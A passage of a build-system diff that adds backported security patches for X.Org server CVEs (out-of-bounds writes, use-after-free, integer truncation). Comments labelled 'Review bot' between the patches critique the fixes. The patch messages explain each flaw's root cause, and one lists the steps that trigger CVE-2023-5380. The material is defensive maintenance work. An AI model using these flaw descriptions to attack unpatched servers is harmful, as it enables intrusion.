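+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch
@@ -0,0 +1,86 @@
+From 51eb63b0ee1509c6c6b8922b0e4aa037faa6f78b Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 13:55:32 +1000
+Subject: [PATCH] Xi: disallow passive grabs with a detail > 255
+
+The XKB protocol effectively prevents us from ever using keycodes above
+255. For buttons it's theoretically possible but realistically too niche
+to worry about. For all other passive grabs, the detail must be zero
+anyway.
+
+This fixes an OOB write:
+
+ProcXIPassiveUngrabDevice() calls DeletePassiveGrabFromList with a
+temporary grab struct which contains tempGrab->detail.exact = stuff->detail.
+For matching existing grabs, DeleteDetailFromMask is called with the
+stuff->detail value. This function creates a new mask with the one bit
+representing stuff->detail cleared.
+
+However, the array size for the new mask is 8 * sizeof(CARD32) bits,
+thus any detail above 255 results in an OOB array write.
+
+CVE-2022-46341, ZDI-CAN 19381
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/51eb63b0ee1509c6c6b8922b0e4aa037faa6f78b]
+CVE: CVE-2022-46341
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xi/xipassivegrab.c | 22 ++++++++++++++--------
+ 1 file changed, 14 insertions(+), 8 deletions(-)
+
+diff --git a/Xi/xipassivegrab.c b/Xi/xipassivegrab.c
+index d30f51f..89a5910 100644
+--- a/Xi/xipassivegrab.c
++++ b/Xi/xipassivegrab.c
+@@ -133,6 +133,12 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ return BadValue;
+ }
+
++ /* XI2 allows 32-bit keycodes but thanks to XKB we can never
++ * implement this. Just return an error for all keycodes that
++ * cannot work anyway, same for buttons > 255. */
++ if (stuff->detail > 255)
++ return XIAlreadyGrabbed;
++
+ if (XICheckInvalidMaskBits(client, (unsigned char *) &stuff[1],
+ stuff->mask_len * 4) != Success)
+ return BadValue;
+@@ -203,14 +209,8 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ &param, XI2, &mask);
+ break;
+ case XIGrabtypeKeycode:
+- /* XI2 allows 32-bit keycodes but thanks to XKB we can never
+- * implement this. Just return an error for all keycodes that
+- * cannot work anyway */
+- if (stuff->detail > 255)
+- status = XIAlreadyGrabbed;
+- else
+- status = GrabKey(client, dev, mod_dev, stuff->detail,
+- &param, XI2, &mask);
++ status = GrabKey(client, dev, mod_dev, stuff->detail,
++ &param, XI2, &mask);
+ break;
+ case XIGrabtypeEnter:
+ case XIGrabtypeFocusIn:
+@@ -319,6 +319,12 @@ ProcXIPassiveUngrabDevice(ClientPtr client)
+ return BadValue;
+ }
+
++ /* We don't allow passive grabs for details > 255 anyway */
++ if (stuff->detail > 255) {
++ client->errorValue = stuff->detail;
++ return BadValue;
++ }
++
+ rc = dixLookupWindow(&win, stuff->grab_window, client, DixSetAttrAccess);
+ if (rc != Success)
+ return rc;
+--
+2.25.1
+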
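Review bot: The check added to ProcXIPassiveGrabDevice returns `XIAlreadyGrabbed` directly, but in the removed `XIGrabtypeKeycode` branch that value was assigned to `status`, so it was a per-modifier grab status and not the handler's return code. If the dispatcher interprets the return value as an X protocol error (most of the function is outside the inner hunks, so this is an inference), clients get an unrelated error and no `client->errorValue`, unlike the matching check added to ProcXIPassiveUngrabDevice in the same patch. Either mirror the ungrab path with `client->errorValue = stuff->detail; return BadValue;`, or, to stay identical to upstream, extend the comment with `/* NOTE: returned as the request's result, not as a grab status */` so the mismatch is visible to the next reader.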
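diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch
new file mode 100644
index 0000000000..23fef3f321
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch
@@ -0,0 +1,78 @@
+From b79f32b57cc0c1186b2899bce7cf89f7b325161b Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 30 Nov 2022 11:20:40 +1000
+Subject: [PATCH] Xext: free the XvRTVideoNotify when turning off from the same
+ client
+
+This fixes a use-after-free bug:
+
+When a client first calls XvdiSelectVideoNotify() on a drawable with a
+TRUE onoff argument, a struct XvVideoNotifyRec is allocated. This struct
+is added twice to the resources:
+ - as the drawable's XvRTVideoNotifyList. This happens only once per
+ drawable, subsequent calls append to this list.
+ - as the client's XvRTVideoNotify. This happens for every client.
+
+The struct keeps the ClientPtr around once it has been added for a
+client. The idea, presumably, is that if the client disconnects we can remove
+all structs from the drawable's list that match the client (by resetting
+the ClientPtr to NULL), but if the drawable is destroyed we can remove
+and free the whole list.
+
+However, if the same client then calls XvdiSelectVideoNotify() on the
+same drawable with a FALSE onoff argument, only the ClientPtr on the
+existing struct was set to NULL. The struct itself remained in the
+client's resources.
+
+If the drawable is now destroyed, the resource system invokes
+XvdiDestroyVideoNotifyList which frees the whole list for this drawable
+- including our struct. This function however does not free the resource
+for the client since our ClientPtr is NULL.
+
+Later, when the client is destroyed and the resource system invokes
+XvdiDestroyVideoNotify, we unconditionally set the ClientPtr to NULL. On
+a struct that has been freed previously. This is generally frowned upon.
+
+Fix this by calling FreeResource() on the second call instead of merely
+setting the ClientPtr to NULL. This removes the struct from the client
+resources (but not from the list), ensuring that it won't be accessed
+again when the client quits.
+
+Note that the assignment tpn->client = NULL; is superfluous since the
+XvdiDestroyVideoNotify function will do this anyway. But it's left for
+clarity and to match a similar invocation in XvdiSelectPortNotify.
+
+CVE-2022-46342, ZDI-CAN 19400
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/b79f32b57cc0c1186b2899bce7cf89f7b325161b]
+CVE: CVE-2022-46342
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/xvmain.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/Xext/xvmain.c b/Xext/xvmain.c
+index c520c7d..5f4c174 100644
+--- a/Xext/xvmain.c
++++ b/Xext/xvmain.c
+@@ -811,8 +811,10 @@ XvdiSelectVideoNotify(ClientPtr client, DrawablePtr pDraw, BOOL onoff)
+ tpn = pn;
+ while (tpn) {
+ if (tpn->client == client) {
+- if (!onoff)
++ if (!onoff) {
+ tpn->client = NULL;
++ FreeResource(tpn->id, XvRTVideoNotify);
++ }
+ return Success;
+ }
+ if (!tpn->client)
+--
+2.25.1
+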
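diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch
new file mode 100644
index 0000000000..838f7d3726
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch
@@ -0,0 +1,51 @@
+From 842ca3ccef100ce010d1d8f5f6d6cc1915055900 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 14:53:07 +1000
+Subject: [PATCH] Xext: free the screen saver resource when replacing it
+
+This fixes a use-after-free bug:
+
+When a client first calls ScreenSaverSetAttributes(), a struct
+ScreenSaverAttrRec is allocated and added to the client's
+resources.
+
+When the same client calls ScreenSaverSetAttributes() again, a new
+struct ScreenSaverAttrRec is allocated, replacing the old struct. The
+old struct was freed but not removed from the clients resources.
+
+Later, when the client is destroyed the resource system invokes
+ScreenSaverFreeAttr and attempts to clean up the already freed struct.
+
+Fix this by letting the resource system free the old attrs instead.
+
+CVE-2022-46343, ZDI-CAN 19404
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/842ca3ccef100ce010d1d8f5f6d6cc1915055900]
+CVE: CVE-2022-46343
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/saver.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Xext/saver.c b/Xext/saver.c
+index c23907d..05b9ca3 100644
+--- a/Xext/saver.c
++++ b/Xext/saver.c
+@@ -1051,7 +1051,7 @@ ScreenSaverSetAttributes(ClientPtr client)
+ pVlist++;
+ }
+ if (pPriv->attr)
+- FreeScreenAttr(pPriv->attr);
++ FreeResource(pPriv->attr->resource, AttrType);
+ pPriv->attr = pAttr;
+ pAttr->resource = FakeClientID(client->index);
+ if (!AddResource(pAttr->resource, AttrType, (void *) pAttr))
+--
+2.25.1
+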
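diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch
new file mode 100644
index 0000000000..e25afa0d16
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch
@@ -0,0 +1,75 @@
+From 8f454b793e1f13c99872c15f0eed1d7f3b823fe8 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 13:26:57 +1000
+Subject: [PATCH] Xi: avoid integer truncation in length check of
+ ProcXIChangeProperty
+
+This fixes an OOB read and the resulting information disclosure.
+
+Length calculation for the request was clipped to a 32-bit integer. With
+the correct stuff->num_items value the expected request size was
+truncated, passing the REQUEST_FIXED_SIZE check.
+
+The server then proceeded with reading at least stuff->num_items bytes
+(depending on stuff->format) from the request and stuffing whatever it
+finds into the property. In the process it would also allocate at least
+stuff->num_items bytes, i.e. 4GB.
+
+The same bug exists in ProcChangeProperty and ProcXChangeDeviceProperty,
+so let's fix that too.
+
+CVE-2022-46344, ZDI-CAN 19405
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/8f454b793e1f13c99872c15f0eed1d7f3b823fe8]
+CVE: CVE-2022-46344
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xi/xiproperty.c | 4 ++--
+ dix/property.c | 3 ++-
+ 2 files changed, 4 insertions(+), 3 deletions(-)
+
+diff --git a/Xi/xiproperty.c b/Xi/xiproperty.c
+index 6ec419e..0cfa6e3 100644
+--- a/Xi/xiproperty.c
++++ b/Xi/xiproperty.c
+@@ -890,7 +890,7 @@ ProcXChangeDeviceProperty(ClientPtr client)
+ REQUEST(xChangeDevicePropertyReq);
+ DeviceIntPtr dev;
+ unsigned long len;
+- int totalSize;
++ uint64_t totalSize;
+ int rc;
+
+ REQUEST_AT_LEAST_SIZE(xChangeDevicePropertyReq);
+@@ -1128,7 +1128,7 @@ ProcXIChangeProperty(ClientPtr client)
+ {
+ int rc;
+ DeviceIntPtr dev;
+- int totalSize;
++ uint64_t totalSize;
+ unsigned long len;
+
+ REQUEST(xXIChangePropertyReq);
+diff --git a/dix/property.c b/dix/property.c
+index ff1d669..6fdb74a 100644
+--- a/dix/property.c
++++ b/dix/property.c
+@@ -205,7 +205,8 @@ ProcChangeProperty(ClientPtr client)
+ WindowPtr pWin;
+ char format, mode;
+ unsigned long len;
+- int sizeInBytes, totalSize, err;
++ int sizeInBytes, err;
++ uint64_t totalSize;
+
+ REQUEST(xChangePropertyReq);
+
+--
+2.25.1
+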
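diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch
new file mode 100644
index 0000000000..ef2ee5d55e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch
@@ -0,0 +1,38 @@
+From 0ba6d8c37071131a49790243cdac55392ecf71ec Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Wed, 25 Jan 2023 11:41:40 +1000
+Subject: [PATCH] Xi: fix potential use-after-free in DeepCopyPointerClasses
+
+CVE-2023-0494, ZDI-CAN-19596
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/0ba6d8c37071131a49790243cdac55392ecf71ec]
+CVE: CVE-2023-0494
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index 217baa9561..dcd4efb3bc 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -619,8 +619,10 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+ memcpy(to->button->xkb_acts, from->button->xkb_acts,
+ sizeof(XkbAction));
+ }
+- else
++ else {
+ free(to->button->xkb_acts);
++ to->button->xkb_acts = NULL;
++ }
+
+ memcpy(to->button->labels, from->button->labels,
+ from->button->numButtons * sizeof(Atom));
+--
+GitLab
+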
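diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch
new file mode 100644
index 0000000000..51d0e0cab6
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch
@@ -0,0 +1,46 @@
+From 26ef545b3502f61ca722a7a3373507e88ef64110 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Mon, 13 Mar 2023 11:08:47 +0100
+Subject: [PATCH] composite: Fix use-after-free of the COW
+
+ZDI-CAN-19866/CVE-2023-1393
+
+If a client explicitly destroys the compositor overlay window (aka COW),
+we would leave a dangling pointer to that window in the CompScreen
+structure, which will trigger a use-after-free later.
+
+Make sure to clear the CompScreen pointer to the COW when the latter gets
+destroyed explicitly by the client.
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Reviewed-by: Adam Jackson <ajax@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/26ef545b3502f61ca722a7a3373507e88ef64110]
+CVE: CVE-2023-1393
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ composite/compwindow.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/composite/compwindow.c b/composite/compwindow.c
+index 4e2494b86b..b30da589e9 100644
+--- a/composite/compwindow.c
++++ b/composite/compwindow.c
+@@ -620,6 +620,11 @@ compDestroyWindow(WindowPtr pWin)
+ ret = (*pScreen->DestroyWindow) (pWin);
+ cs->DestroyWindow = pScreen->DestroyWindow;
+ pScreen->DestroyWindow = compDestroyWindow;
++
++ /* Did we just destroy the overlay window? */
++ if (pWin == cs->pOverlayWin)
++ cs->pOverlayWin = NULL;
++
+ /* compCheckTree (pWin->drawable.pScreen); can't check -- tree isn't good*/
+ return ret;
+ }
+--
+GitLab
+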
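diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch
new file mode 100644
index 0000000000..508588481e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch
@@ -0,0 +1,84 @@
+From 541ab2ecd41d4d8689e71855d93e492bc554719a Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 3 Oct 2023 11:53:05 +1000
+Subject: [PATCH] Xi/randr: fix handling of PropModeAppend/Prepend
+
+The handling of appending/prepending properties was incorrect, with at
+least two bugs: the property length was set to the length of the new
+part only, i.e. appending or prepending N elements to a property with P
+existing elements always resulted in the property having N elements
+instead of N + P.
+
+Second, when pre-pending a value to a property, the offset for the old
+values was incorrect, leaving the new property with potentially
+uninitalized values and/or resulting in OOB memory writes.
+For example, prepending a 3 element value to a 5 element property would
+result in this 8 value array:
+ [N, N, N, ?, ?, P, P, P ] P, P
+ ^OOB write
+
+The XI2 code is a copy/paste of the RandR code, so the bug exists in
+both.
+
+CVE-2023-5367, ZDI-CAN-22153
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/541ab2ecd41d4d8689e71855d93e492bc554719a]
+CVE: CVE-2023-5367
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xiproperty.c | 4 ++--
+ randr/rrproperty.c | 4 ++--
+ 2 files changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/Xi/xiproperty.c b/Xi/xiproperty.c
+index 066ba21fba..d315f04d0e 100644
+--- a/Xi/xiproperty.c
++++ b/Xi/xiproperty.c
+@@ -730,7 +730,7 @@ XIChangeDeviceProperty(DeviceIntPtr dev, Atom property, Atom type,
+ XIDestroyDeviceProperty(prop);
+ return BadAlloc;
+ }
+- new_value.size = len;
++ new_value.size = total_len;
+ new_value.type = type;
+ new_value.format = format;
+
+@@ -747,7 +747,7 @@ XIChangeDeviceProperty(DeviceIntPtr dev, Atom property, Atom type,
+ case PropModePrepend:
+ new_data = new_value.data;
+ old_data = (void *) (((char *) new_value.data) +
+- (prop_value->size * size_in_bytes));
++ (len * size_in_bytes));
+ break;
+ }
+ if (new_data)
+diff --git a/randr/rrproperty.c b/randr/rrproperty.c
+index c2fb9585c6..25469f57b2 100644
+--- a/randr/rrproperty.c
++++ b/randr/rrproperty.c
+@@ -209,7 +209,7 @@ RRChangeOutputProperty(RROutputPtr output, Atom property, Atom type,
+ RRDestroyOutputProperty(prop);
+ return BadAlloc;
+ }
+- new_value.size = len;
++ new_value.size = total_len;
+ new_value.type = type;
+ new_value.format = format;
+
+@@ -226,7 +226,7 @@ RRChangeOutputProperty(RROutputPtr output, Atom property, Atom type,
+ case PropModePrepend:
+ new_data = new_value.data;
+ old_data = (void *) (((char *) new_value.data) +
+- (prop_value->size * size_in_bytes));
++ (len * size_in_bytes));
+ break;
+ }
+ if (new_data)
+--
+GitLab
+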
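--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch
@@ -0,0 +1,102 @@
+From 564ccf2ce9616620456102727acb8b0256b7bbd7 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 5 Oct 2023 12:19:45 +1000
+Subject: [PATCH] mi: reset the PointerWindows reference on screen switch
+
+PointerWindows[] keeps a reference to the last window our sprite
+entered - changes are usually handled by CheckMotion().
+
+If we switch between screens via XWarpPointer our
+dev->spriteInfo->sprite->win is set to the new screen's root window.
+If there's another window at the cursor location CheckMotion() will
+trigger the right enter/leave events later. If there is not, it skips
+that process and we never trigger LeaveWindow() - PointerWindows[] for
+the device still refers to the previous window.
+
+If that window is destroyed we have a dangling reference that will
+eventually cause a use-after-free bug when checking the window hierarchy
+later.
+
+To trigger this, we require:
+- two protocol screens
+- XWarpPointer to the other screen's root window
+- XDestroyWindow before entering any other window
+
+This is a niche bug so we hack around it by making sure we reset the
+PointerWindows[] entry so we cannot have a dangling pointer. This
+doesn't handle Enter/Leave events correctly but the previous code didn't
+either.
+
+CVE-2023-5380, ZDI-CAN-21608
+
+This vulnerability was discovered by:
+Sri working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Reviewed-by: Adam Jackson <ajax@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/564ccf2ce9616620456102727acb8b0256b7bbd7]
+CVE: CVE-2023-5380
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.h | 2 --
+ include/eventstr.h | 3 +++
+ mi/mipointer.c | 17 +++++++++++++++--
+ 3 files changed, 18 insertions(+), 4 deletions(-)
+
+diff --git a/dix/enterleave.h b/dix/enterleave.h
+index 4b833d8..e8af924 100644
+--- a/dix/enterleave.h
++++ b/dix/enterleave.h
+@@ -58,8 +58,6 @@ extern void DeviceFocusEvent(DeviceIntPtr dev,
+
+ extern void EnterWindow(DeviceIntPtr dev, WindowPtr win, int mode);
+
+-extern void LeaveWindow(DeviceIntPtr dev);
+-
+ extern void CoreFocusEvent(DeviceIntPtr kbd,
+ int type, int mode, int detail, WindowPtr pWin);
+
+diff --git a/include/eventstr.h b/include/eventstr.h
+index bf3b95f..2bae3b0 100644
+--- a/include/eventstr.h
++++ b/include/eventstr.h
+@@ -296,4 +296,7 @@ union _InternalEvent {
+ #endif
+ };
+
++extern void
++LeaveWindow(DeviceIntPtr dev);
++
+ #endif
+diff --git a/mi/mipointer.c b/mi/mipointer.c
+index 75be1ae..b12ae9b 100644
+--- a/mi/mipointer.c
++++ b/mi/mipointer.c
+@@ -397,8 +397,21 @@ miPointerWarpCursor(DeviceIntPtr pDev, ScreenPtr pScreen, int x, int y)
+ #ifdef PANORAMIX
+ && noPanoramiXExtension
+ #endif
+- )
+- UpdateSpriteForScreen(pDev, pScreen);
++ ) {
++ DeviceIntPtr master = GetMaster(pDev, MASTER_POINTER);
++ /* Hack for CVE-2023-5380: if we're moving
++ * screens PointerWindows[] keeps referring to the
++ * old window. If that gets destroyed we have a UAF
++ * bug later. Only happens when jumping from a window
++ * to the root window on the other screen.
++ * Enter/Leave events are incorrect for that case but
++ * too niche to fix.
++ */
++ LeaveWindow(pDev);
++ if (master)
++ LeaveWindow(master);
++ UpdateSpriteForScreen(pDev, pScreen);
++ }
+ }
+
+ /**
+--
+2.25.1
+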
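Review bot: The `LeaveWindow` prototype added to include/eventstr.h carries no comment explaining why a dix enter/leave function is now declared in the event-structure header, and the mi/mipointer.c hunk relies on that placement silently. I would add a line above it such as `/* declared here, presumably so mi/mipointer.c can reset PointerWindows[] for CVE-2023-5380 */`, reworded once the reason is confirmed. In the mipointer.c hunk, `GetMaster(pDev, MASTER_POINTER)` may hand back `pDev` itself when pDev is already a master device, in which case `if (master && master != pDev)` would skip a redundant second call; GetMaster is not visible here, so confirm before changing. miPointerWarpCursor begins outside the hunk.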
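--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch
@@ -0,0 +1,79 @@
+From 0c1a93d319558fe3ab2d94f51d174b4f93810afd Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 28 Nov 2023 15:19:04 +1000
+Subject: [PATCH] Xi: allocate enough XkbActions for our buttons
+
+button->xkb_acts is supposed to be an array sufficiently large for all
+our buttons, not just a single XkbActions struct. Allocating
+insufficient memory here means when we memcpy() later in
+XkbSetDeviceInfo we write into memory that wasn't ours to begin with,
+leading to the usual security ooopsiedaisies.
+
+CVE-2023-6377, ZDI-CAN-22412, ZDI-CAN-22413
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/0c1a93d319558fe3ab2d94f51d174b4f93810afd]
+CVE: CVE-2023-6377
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 12 ++++++------
+ dix/devices.c | 10 ++++++++++
+ 2 files changed, 16 insertions(+), 6 deletions(-)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index dcd4efb3bc..54ea11a938 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -611,13 +611,13 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+ }
+
+ if (from->button->xkb_acts) {
+- if (!to->button->xkb_acts) {
+- to->button->xkb_acts = calloc(1, sizeof(XkbAction));
+- if (!to->button->xkb_acts)
+- FatalError("[Xi] not enough memory for xkb_acts.\n");
+- }
++ size_t maxbuttons = max(to->button->numButtons, from->button->numButtons);
++ to->button->xkb_acts = xnfreallocarray(to->button->xkb_acts,
++ maxbuttons,
++ sizeof(XkbAction));
++ memset(to->button->xkb_acts, 0, maxbuttons * sizeof(XkbAction));
+ memcpy(to->button->xkb_acts, from->button->xkb_acts,
+- sizeof(XkbAction));
++ from->button->numButtons * sizeof(XkbAction));
+ }
+ else {
+ free(to->button->xkb_acts);
+diff --git a/dix/devices.c b/dix/devices.c
+index b063128df0..3f3224d626 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -2539,6 +2539,8 @@ RecalculateMasterButtons(DeviceIntPtr slave)
+
+ if (master->button && master->button->numButtons != maxbuttons) {
+ int i;
++ int last_num_buttons = master->button->numButtons;
++
+ DeviceChangedEvent event = {
+ .header = ET_Internal,
+ .type = ET_DeviceChanged,
+@@ -2549,6 +2551,14 @@ RecalculateMasterButtons(DeviceIntPtr slave)
+ };
+
+ master->button->numButtons = maxbuttons;
++ if (last_num_buttons < maxbuttons) {
++ master->button->xkb_acts = xnfreallocarray(master->button->xkb_acts,
++ maxbuttons,
++ sizeof(XkbAction));
++ memset(&master->button->xkb_acts[last_num_buttons],
++ 0,
++ (maxbuttons - last_num_buttons) * sizeof(XkbAction));
++ }
+
+ memcpy(&event.buttons.names, master->button->labels, maxbuttons *
+ sizeof(Atom));
+--
+GitLab
+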
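Review bot: In the dix/devices.c hunk the `memset` clears only the entries from `last_num_buttons` upward, so if `master->button->xkb_acts` was NULL on entry, `xnfreallocarray` returns a fresh array whose first `last_num_buttons` entries are never initialised. The `else` branch in the Xi/exevents.c hunk frees `to->button->xkb_acts`, which suggests a button class with buttons but no action array is a reachable state; confirm against the rest of RecalculateMasterButtons, which continues outside the hunk. Recording `int first_new = master->button->xkb_acts ? last_num_buttons : 0;` before the realloc and clearing from `&master->button->xkb_acts[first_new]` for `(maxbuttons - first_new)` entries would cover that case without changing the grown-array path.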
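--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch
@@ -0,0 +1,63 @@
+From 14f480010a93ff962fef66a16412fafff81ad632 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 27 Nov 2023 16:27:49 +1000
+Subject: [PATCH] randr: avoid integer truncation in length check of
+ ProcRRChange*Property
+
+Affected are ProcRRChangeProviderProperty and ProcRRChangeOutputProperty.
+See also xserver@8f454b79 where this same bug was fixed for the core
+protocol and XI.
+
+This fixes an OOB read and the resulting information disclosure.
+
+Length calculation for the request was clipped to a 32-bit integer. With
+the correct stuff->nUnits value the expected request size was
+truncated, passing the REQUEST_FIXED_SIZE check.
+
+The server then proceeded with reading at least stuff->num_items bytes
+(depending on stuff->format) from the request and stuffing whatever it
+finds into the property. In the process it would also allocate at least
+stuff->nUnits bytes, i.e. 4GB.
+
+CVE-2023-6478, ZDI-CAN-22561
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/14f480010a93ff962fef66a16412fafff81ad632]
+CVE: CVE-2023-6478
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ randr/rrproperty.c | 2 +-
+ randr/rrproviderproperty.c | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/randr/rrproperty.c b/randr/rrproperty.c
+index 25469f57b2..c4fef8a1f6 100644
+--- a/randr/rrproperty.c
++++ b/randr/rrproperty.c
+@@ -530,7 +530,7 @@ ProcRRChangeOutputProperty(ClientPtr client)
+ char format, mode;
+ unsigned long len;
+ int sizeInBytes;
+- int totalSize;
++ uint64_t totalSize;
+ int err;
+
+ REQUEST_AT_LEAST_SIZE(xRRChangeOutputPropertyReq);
+diff --git a/randr/rrproviderproperty.c b/randr/rrproviderproperty.c
+index b79c17f9bf..90c5a9a933 100644
+--- a/randr/rrproviderproperty.c
++++ b/randr/rrproviderproperty.c
+@@ -498,7 +498,7 @@ ProcRRChangeProviderProperty(ClientPtr client)
+ char format, mode;
+ unsigned long len;
+ int sizeInBytes;
+- int totalSize;
++ uint64_t totalSize;
+ int err;
+
+ REQUEST_AT_LEAST_SIZE(xRRChangeProviderPropertyReq);
+--
+GitLab
+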
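Review bot: Widening `totalSize` to `uint64_t` only helps if the value assigned to it is computed in 64 bits, and `len` is declared `unsigned long` two lines above it in both hunks, which is 32 bits wide on ILP32 targets. The assignment itself is outside the hunks; if it is the plain product of `len` and `sizeInBytes`, the multiplication can still wrap on a 32-bit build before the result reaches the request-size check. I would write it as `totalSize = (uint64_t) len * sizeInBytes;` in both ProcRRChangeOutputProperty and ProcRRChangeProviderProperty, and confirm on a 32-bit machine configuration that the length check rejects an oversized `nUnits`.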
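--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch
@@ -0,0 +1,55 @@
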